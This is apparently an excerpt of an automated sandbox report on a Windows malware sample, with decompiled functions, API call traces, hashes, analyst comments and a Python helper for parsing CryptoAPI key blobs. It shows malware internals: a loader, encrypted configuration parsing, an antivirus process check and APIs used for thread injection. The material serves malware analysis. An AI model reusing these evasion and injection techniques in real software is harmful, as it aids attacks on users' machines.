            • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E61DA(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x7ea2d8, 0, _a4); // executed
            				return _t2;
            			}

            Instruction addresses, one per decompiled statement above: 0x007e61e6 0x007e61ec

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 1c06d3a84757d95063294c339fcff09ce9d54f5248b22848748fc867dfd4ebea
            • Instruction ID: fd6f9795cf12ba65f9eacfdaa518f291d152321e6d326c6442fe4229195918ad
            • Opcode Fuzzy Hash: 1c06d3a84757d95063294c339fcff09ce9d54f5248b22848748fc867dfd4ebea
            • Instruction Fuzzy Hash: 94B01273101240FBCB114B01DE44F057B21B7D8700F00C010B3041807082361420FB1E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E004012FB(void* __eax) {
            				char _v8;
            				void* _v12;
            				void* __edi;
            				void* _t18;
            				long _t24;
            				long _t26;
            				long _t29;
            				intOrPtr _t40;
            				void* _t41;
            				void* _t42;
            				void* _t44;
            
            				_t41 = __eax;
            				_t16 =  *0x404180;
            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
            				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
            				if(_t18 != 0) {
            					_t29 = 8;
            					goto L8;
            				} else {
            					_t40 = _v8;
            					_t29 = E00401BC4(_t33, _t40, _t41);
            					if(_t29 == 0) {
            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
            						_t24 = E00401000(_t40, _t44); // executed
            						_t29 = _t24;
            						if(_t29 == 0) {
            							_t26 = E004014CF(_t44, _t40); // executed
            							_t29 = _t26;
            							if(_t29 == 0) {
            								_push(_t26);
            								_push(1);
            								_push(_t40);
            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
            									_t29 = GetLastError();
            								}
            							}
            						}
            					}
            					_t42 = _v12;
            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
            					E00401BA9(_t42);
            					L8:
            					return _t29;
            				}
            			}

            Instruction addresses, one per decompiled statement above: 0x00401303 0x00401305 0x00401321 0x00401332 0x00401339 0x00401397 0x00000000 0x0040133b 0x0040133b 0x00401345 0x00401349 0x0040134e 0x00401351 0x00401356 0x0040135a 0x0040135f 0x00401364 0x00401368 0x0040136d 0x0040136e 0x00401372 0x00401377 0x0040137f 0x0040137f 0x00401377 0x00401368 0x0040135a 0x00401381 0x0040138a 0x0040138e 0x00401398 0x0040139e 0x0040139e

            APIs
              • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
              • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
            • GetLastError.KERNEL32(?,?), ref: 00401379
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
            • String ID:
            • API String ID: 3135819546-0
            • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
            • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008555DF
            Memory Dump Source
            • Source File: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_850000_server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction ID: a69ea9c291d3d813d51fae29e77659cabb4e4bf7d9fd4ee925d7005a7277cd23
            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction Fuzzy Hash: 72112B79A00208EFDB01DF98C985E99BBF5EF08351F4580A4F9489B362D371EA50DB80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E33F1(intOrPtr* __edi, void* _a4, char _a8, unsigned int _a12) {
            				// Fetches a registry value as a wide string and returns it through *__edi; a non-zero return value means failure.
            				void* _t21;
            				void* _t22;
            				signed int _t24;
            				intOrPtr* _t26;
            				void* _t27;
            
            				_t26 = __edi;
            				if(_a4 == 0) {
            					L2:
            					// 0x80000002 is HKEY_LOCAL_MACHINE. E007E58BD performs the read and hands back the buffer in _a4
            					// and its length in bytes in _a12.
            					_t27 = E007E58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
            					if(_t27 == 0) {
            						_t24 = _a12 >> 1; // byte length -> WCHAR count
            						if(_t24 == 0) {
            							_t27 = 2; // empty value: release the buffer and report failure
            							HeapFree( *0x7ea2d8, 0, _a4); // *0x7ea2d8 holds the heap handle used throughout this module
            						} else {
            							_t21 = _a4;
            							 *((short*)(_t21 + _t24 * 2 - 2)) = 0; // overwrite the last WCHAR with a terminating NUL
            							 *_t26 = _t21;
            						}
            					}
            					L6:
            					return _t27;
            				}
            				// With a non-zero _a4 the first attempt goes through E007E2839 (whose subcall releases a BSTR with
            				// SysFreeString); only if that fails does execution fall back to the direct registry read at L2.
            				_t22 = E007E2839(_a4, _a8, _a12, __edi); // executed
            				_t27 = _t22;
            				if(_t27 == 0) {
            					goto L6;
            				}
            				goto L2;
            			}

            Instruction addresses: 0x007e33f1 to 0x007e345e

            APIs
              • Part of subcall function 007E2839: SysFreeString.OLEAUT32(00000000), ref: 007E289C
            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74D0F710,?,00000000,?,00000000,?,007E528E,?,004F0053,02F19218,00000000,?), ref: 007E3454
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Free$HeapString
            • String ID:
            • API String ID: 3806048269-0
            • Opcode ID: 3e36bdb33abb547209dab0161bd40e5a39bb24155bf4c00c73e55b1e290f2918
            • Instruction ID: 150c741681032f8460fd76da3174000765ade0e393363b9734e548f0d97d8176
            • Opcode Fuzzy Hash: 3e36bdb33abb547209dab0161bd40e5a39bb24155bf4c00c73e55b1e290f2918
            • Instruction Fuzzy Hash: 47012C32502599FBDB239F55CC05EEA3BA9EF48750F048025FE059B161D7359A60DB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E007E5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
            				void* _t13;
            				void* _t21;
            				void* _t11; // used below but left undeclared by the decompiler
            
            				_t11 =  &_a4;
            				_t21 = 0;
            				__imp__( &_a8); // the lstrlen import listed under APIs; the decompiler did not recover its argument cleanly
            				// E007E1508 wraps CryptoAPI: CryptAcquireContextW with dwProvType 0x18 (PROV_RSA_AES) and dwFlags
            				// 0xF0000000 (CRYPT_VERIFYCONTEXT), CryptImportKey of a 0x1C-byte blob (12-byte BLOBHEADER plus length
            				// field and a 16-byte key, if it is a PLAINTEXTKEYBLOB) and CryptSetKeyParam with dwParam 1 (KP_IV).
            				// The two 16-byte memcpy calls in its trace are consistent with a 16-byte key and a 16-byte IV.
            				_t13 = E007E1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
            				if(_t13 == 0) {
            					_t21 = E007E33DC(_a8 + _a8); // RtlAllocateHeap: output buffer of twice the input length
            					if(_t21 != 0) {
            						E007E22EA(_a4, _t21, _t23); // _t23 is a register value the decompiler could not resolve
            					}
            					E007E61DA(_a4);
            				}
            				return _t21;
            			}

            Instruction addresses: 0x007e506b to 0x007e50b6

            APIs
            • lstrlen.KERNEL32(00000000,00000000,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E5074
              • Part of subcall function 007E1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,007E5088,00000001,007E3ECE,00000000), ref: 007E1540
              • Part of subcall function 007E1508: memcpy.NTDLL(007E5088,007E3ECE,00000010,?,?,?,007E5088,00000001,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740), ref: 007E1559
              • Part of subcall function 007E1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 007E1582
              • Part of subcall function 007E1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 007E159A
              • Part of subcall function 007E1508: memcpy.NTDLL(00000000,7491C740,02F19600,00000010), ref: 007E15EC
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
            • String ID:
            • API String ID: 894908221-0
            • Opcode ID: 580b489009f49105a7caaa96e082652e787896522a1869db6ff309fb9271f477
            • Instruction ID: 8636b0ed50a5e4f6af20a2085f6f84a3c7801f9d0ec56b3e320aa5827fa71e84
            • Opcode Fuzzy Hash: 580b489009f49105a7caaa96e082652e787896522a1869db6ff309fb9271f477
            • Instruction Fuzzy Hash: 57F0BE3610204CBBCF12AF66CC04CDA3BADEF8C3A4B008022FE08CA011DA35DA519BA0
            Uniqueness

            Uniqueness Score: -1.00%
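            The CryptoAPI sequence inside E007E1508 (CryptAcquireContextW with provider type 0x18 and flags 0xF0000000, CryptImportKey with a 0x1C-byte blob, CryptSetKeyParam with parameter 1, two 16-byte memcpy calls) is only readable once the blob layout is known. The Python below is an added worked example, not code from the sample or from Joe Sandbox: it builds and parses a PLAINTEXTKEYBLOB so that the 0x1C length passed to CryptImportKey can be related to a 128-bit key, and names the CryptAcquireContextW constants. The 16-byte key is constructed for the demonstration; nothing is taken from the sample's memory, and whether this sample's blob really is a PLAINTEXTKEYBLOB is an assumption the trace supports but does not prove.

```python
import struct

# CryptoAPI constants relevant to the calls in E007E1508 (values from wincrypt.h).
PROV_RSA_AES = 0x18               # dwProvType in CryptAcquireContextW
CRYPT_VERIFYCONTEXT = 0xF0000000  # dwFlags in CryptAcquireContextW: ephemeral context, no key container on disk
KP_IV = 1                         # dwParam in CryptSetKeyParam: sets the IV
PLAINTEXTKEYBLOB = 0x08           # BLOBHEADER.bType for a raw symmetric key
CUR_BLOB_VERSION = 0x02
CALG_AES_128 = 0x0000660E
CALG_AES_192 = 0x0000660F
CALG_AES_256 = 0x00006610

# BLOBHEADER (bType, bVersion, reserved, aiKeyAlg) followed by the DWORD key length: 12 bytes in total.
_HEADER = struct.Struct("<BBHII")


def build_plaintext_key_blob(key, alg_id=CALG_AES_128):
    """Serialise a raw key in the layout CryptImportKey expects for a PLAINTEXTKEYBLOB."""
    key = bytes(key)
    return _HEADER.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, len(key)) + key


def parse_plaintext_key_blob(blob):
    """Validate the header and return (alg_id, key). Raises ValueError if the blob is malformed."""
    if len(blob) < _HEADER.size:
        raise ValueError("blob shorter than BLOBHEADER + cbKey")
    b_type, version, reserved, alg_id, cb_key = _HEADER.unpack_from(blob)
    if b_type != PLAINTEXTKEYBLOB or version != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("not a PLAINTEXTKEYBLOB")
    if len(blob) != _HEADER.size + cb_key:
        raise ValueError("cbKey does not match the blob length")
    return alg_id, blob[_HEADER.size:]


def is_plaintext_key_blob(blob):
    """Boolean wrapper around parse_plaintext_key_blob for quick triage of a dumped buffer."""
    try:
        parse_plaintext_key_blob(blob)
        return True
    except ValueError:
        return False


def key_bits_from_blob_length(dw_data_len):
    """Infer the key size from the dwDataLen argument alone (0x1C in the trace above)."""
    if dw_data_len < _HEADER.size:
        raise ValueError("too short for a PLAINTEXTKEYBLOB")
    return (dw_data_len - _HEADER.size) * 8


def describe_acquire_context(prov_type, flags):
    """Name the provider type and flags seen in a CryptAcquireContextW call."""
    prov = "PROV_RSA_AES" if prov_type == PROV_RSA_AES else hex(prov_type)
    flag_names = []
    if (flags & CRYPT_VERIFYCONTEXT) == CRYPT_VERIFYCONTEXT:
        flag_names.append("CRYPT_VERIFYCONTEXT")
    rest = flags & ~CRYPT_VERIFYCONTEXT & 0xFFFFFFFF
    if rest:
        flag_names.append(hex(rest))
    return prov, flag_names


if __name__ == "__main__":
    demo_key = bytes(range(16))  # constructed key, not extracted from the sample
    blob = build_plaintext_key_blob(demo_key)
    print(hex(len(blob)), key_bits_from_blob_length(len(blob)))
    print(parse_plaintext_key_blob(blob))
    print(describe_acquire_context(0x18, 0xF0000000))
```

            When the key buffer is located in a memory dump, parse_plaintext_key_blob recovers the algorithm identifier and key bytes; a 16-byte IV set through KP_IV matches the AES block size, so a chained block mode is the natural reading of the trace, but the mode itself is not visible in these calls and would have to be confirmed from the CryptSetKeyParam(KP_MODE) call or from the decrypted output.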

            APIs
              • Part of subcall function 00781FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00781C63), ref: 00781FDE
              • Part of subcall function 00781FCF: GetVersion.KERNEL32(?,00781C63), ref: 00781FED
              • Part of subcall function 00781FCF: GetCurrentProcessId.KERNEL32(?,00781C63), ref: 00782009
              • Part of subcall function 00781FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00781C63), ref: 00782022
              • Part of subcall function 0078154D: RtlAllocateHeap.NTDLL(00000000,?,00781477), ref: 00781559
            • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00781C8D
            • Sleep.KERNEL32(00000000,00000030), ref: 00781CD4
            • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00781CFC
            • GetSystemDefaultUILanguage.KERNEL32 ref: 00781D06
            • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00781D19
            • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00781D8E
            • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 00781DA4
            • GetLastError.KERNEL32 ref: 00781DB4
            • TerminateThread.KERNEL32(00000000,00000000), ref: 00781DBE
            • SetLastError.KERNEL32(00000000), ref: 00781DCA
            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00781DD7
            • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00781DE9
            • GetLastError.KERNEL32 ref: 00781DF4
            • GetLastError.KERNEL32 ref: 00781E05
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 1666582358-0
            • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
            • Instruction ID: 3a091a38ebfd1f54e40c2a3ff02f8e3006d786d4cf6eb5ba3d46278308717e95
            • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
            • Instruction Fuzzy Hash: 9051AF71A41614EBEB20FFB59D48AAFBB7DAB44752F904025F901E3154D738CE428BB4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E007E1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
            				int _v8;
            				void* _v12;
            				void* _v16;
            				signed int _t28;
            				signed int _t33;
            				signed int _t39;
            				char* _t45;
            				char* _t46;
            				char* _t47;
            				char* _t48;
            				char* _t49;
            				char* _t50;
            				void* _t51;
            				void* _t52;
            				void* _t53;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t57;
            				intOrPtr _t58;
            				signed int _t61;
            				intOrPtr _t64;
            				signed int _t65;
            				signed int _t70;
            				void* _t72;
            				void* _t73;
            				signed int _t75;
            				signed int _t78;
            				signed int _t82;
            				signed int _t86;
            				signed int _t90;
            				signed int _t94;
            				signed int _t98;
            				void* _t101;
            				void* _t102;
            				void* _t116;
            				void* _t119;
            				intOrPtr _t122;
            
            				_t119 = __esi;
            				_t116 = __edi;
            				_t104 = __ecx;
            				_t101 = __ebx;
            				_t28 =  *0x7ea344; // 0x43175ac3, the seed value: every configuration item below is looked up by seed ^ per-item constant
            				if(E007E10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) { // item present and at least 0x110 bytes long
            					 *0x7ea374 = _v8;
            				}
            				_t33 =  *0x7ea344; // 0x43175ac3
            				if(E007E10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
            					_v12 = 2;
            					L69:
            					return _v12;
            				}
            				_t39 =  *0x7ea344; // 0x43175ac3
            				_push(_t116);
            				if(E007E10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
            					L67:
            					HeapFree( *0x7ea2d8, 0, _v16);
            					goto L69;
            				} else {
            					_push(_t101);
            					_t102 = _v12;
            					if(_t102 == 0) {
            						_t45 = 0;
            					} else {
            						_t98 =  *0x7ea344; // 0x43175ac3
            						_t45 = E007E36C5(_t104, _t102, _t98 ^ 0x523046bc);
            					}
            					_push(_t119);
            					if(_t45 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t45, 0,  &_v8) != 0) { // decimal text -> integer stored in a global; the same pattern repeats for the next five items
            							 *0x7ea2e0 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t46 = 0;
            					} else {
            						_t94 =  *0x7ea344; // 0x43175ac3
            						_t46 = E007E36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
            					}
            					if(_t46 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
            							 *0x7ea2e4 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t47 = 0;
            					} else {
            						_t90 =  *0x7ea344; // 0x43175ac3
            						_t47 = E007E36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
            					}
            					if(_t47 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
            							 *0x7ea2e8 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t48 = 0;
            					} else {
            						_t86 =  *0x7ea344; // 0x43175ac3
            						_t48 = E007E36C5(_t104, _t102, _t86 ^ 0x267c2349);
            					}
            					if(_t48 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
            							 *0x7ea004 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t49 = 0;
            					} else {
            						_t82 =  *0x7ea344; // 0x43175ac3
            						_t49 = E007E36C5(_t104, _t102, _t82 ^ 0x167db74c);
            					}
            					if(_t49 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
            							 *0x7ea02c = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t50 = 0;
            					} else {
            						_t78 =  *0x7ea344; // 0x43175ac3
            						_t50 = E007E36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
            					}
            					if(_t50 == 0) {
            						L41:
            						 *0x7ea2ec = 5; // default when the item is missing or parses as 0
            						goto L42;
            					} else {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
            							goto L41;
            						} else {
            							L42:
            							if(_t102 == 0) {
            								_t51 = 0;
            							} else {
            								_t75 =  *0x7ea344; // 0x43175ac3
            								_t51 = E007E36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
            							}
            							if(_t51 != 0) {
            								_push(_t51);
            								_t72 = 0x10;
            								_t73 = E007E5B85(_t72);
            								if(_t73 != 0) {
            									_push(_t73);
            									E007E607C();
            								}
            							}
            							if(_t102 == 0) {
            								_t52 = 0;
            							} else {
            								_t70 =  *0x7ea344; // 0x43175ac3
            								_t52 = E007E36C5(_t104, _t102, _t70 ^ 0x93710135);
            							}
            							if(_t52 != 0 && E007E5B85(0, _t52) != 0) {
            								_t122 =  *0x7ea3cc; // 0x2f19600
            								E007E5364(_t122 + 4, _t68);
            							}
            							if(_t102 == 0) {
            								_t53 = 0;
            							} else {
            								_t65 =  *0x7ea344; // 0x43175ac3
            								_t53 = E007E36C5(_t104, _t102, _t65 ^ 0x175474b7);
            							}
            					if(_t53 == 0) {
            						L59:
            						_t54 =  *0x7ea348; // 0x272d5a8, offset added to in-image string addresses
            						_t22 = _t54 + 0x7eb5f3; // 0x616d692f is little-endian ASCII "/ima", the first four bytes of the built-in default string
            						 *0x7ea370 = _t22;
            						goto L60;
            							} else {
            								_t64 = E007E5B85(0, _t53);
            								 *0x7ea370 = _t64;
            								if(_t64 != 0) {
            									L60:
            									if(_t102 == 0) {
            										_t56 = 0;
            									} else {
            										_t61 =  *0x7ea344; // 0x43175ac3
            										_t56 = E007E36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
            									}
            									if(_t56 == 0) {
            										_t57 =  *0x7ea348; // 0x272d5a8
            										_t23 = _t57 + 0x7eb899; // 0x6976612e is little-endian ASCII ".avi", the first four bytes of the built-in default string
            										_t58 = _t23;
            									} else {
            										_t58 = E007E5B85(0, _t56);
            									}
            									 *0x7ea3e0 = _t58;
            									HeapFree( *0x7ea2d8, 0, _t102); // release the parsed configuration block; _v16 is released at L67
            									_v12 = 0; // success
            									goto L67;
            								}
            								goto L59;
            							}
            						}
            					}
            				}
            			}

            Instruction addresses: 0x007e1d8a to 0x007e2050

            APIs
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1E2F
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1E61
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1E93
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1EC5
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1EF7
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1F29
            • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 007E2028
            • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 007E203C
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 12556ff02d9077ec6b26712c57b802e25c5998915dd65be11565541e084a2e86
            • Instruction ID: f995b81a28e87fcf5857bc2a5bf5b3e10448c404a3c4cadf13a7f730ccb6d7df
            • Opcode Fuzzy Hash: 12556ff02d9077ec6b26712c57b802e25c5998915dd65be11565541e084a2e86
            • Instruction Fuzzy Hash: 5B819D70A031C4FBCB10EBB68DCAD5B77BDAB4C7007A48925B501DB251EA3DEE408765
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E007E30D5() {
            				// Walks the process list with Toolhelp32 and returns 1 as soon as one entry satisfies the comparison
            				// routine reached through the function pointer at 0x7ea12c (not resolved by the decompiler).
            				char _v264; // PROCESSENTRY32.szExeFile (offset 36 into the structure)
            				void* _v300; // PROCESSENTRY32
            				int _t8;
            				intOrPtr _t9;
            				int _t15;
            				void* _t17;
            
            				_t15 = 0;
            				_t17 = CreateToolhelp32Snapshot(2, 0); // TH32CS_SNAPPROCESS
            				if(_t17 != 0) {
            					_t8 = Process32First(_t17,  &_v300);
            					while(_t8 != 0) {
            						_t9 =  *0x7ea348; // 0x272d5a8, offset added to in-image string addresses
            						_t2 = _t9 + 0x7ebe88; // 0x73617661 is little-endian ASCII "avas", apparently the start of the process name being searched for
            						_push( &_v264); // szExeFile of the current entry
            						if( *0x7ea12c() != 0) {
            							_t15 = 1; // match found
            						} else {
            							_t8 = Process32Next(_t17,  &_v300);
            							continue;
            						}
            						L7:
            						CloseHandle(_t17);
            						goto L8;
            					}
            					goto L7;
            				}
            				L8:
            				return _t15;
            			}

            Instruction addresses: 0x007e30e0 to 0x007e313e

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007E30E5
            • Process32First.KERNEL32(00000000,?), ref: 007E30F8
            • Process32Next.KERNEL32(00000000,?), ref: 007E3124
